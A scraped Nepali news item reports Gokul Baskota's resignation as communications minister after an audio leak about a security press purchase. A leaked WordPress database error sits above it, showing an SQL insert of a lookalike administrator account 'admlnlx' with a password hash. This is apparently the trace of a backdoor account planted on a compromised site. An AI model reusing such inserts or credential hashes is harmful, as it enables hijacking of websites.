WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpvAKt1fR6N1ZGWwXTMaxOq4ehla6k/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 21:16:00', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौँ । गोकुल बाँस्कोटाले ट्वीट गर्दै आफूले सञ्चार तथा सूचना प्रविधि मन्त्रीका रुपमा राजीनामा दिएको जानकारी दिएका छन् ।
बास्कोटाले आफ्नो बारे प्रश्न उठेकोले प्रधानमन्त्री समक्ष नैतिकताको आधारमा मन्त्री पदबाट राजिनामा दिएको बताएका छन्।
सेक्युरिटी प्रेसखरिदका विषयमा स्थानीय एजेन्ट विजयप्रकाश शर्मा मिश्रसँग मोलमोलाइ गरेकोअडियो बुधबार सार्वजनिकभएको थियो।
गोकुल बास्कोटाले आफ्नो फेसबुक मार्फत पोस्ट गरेको आफ्नो भनाइ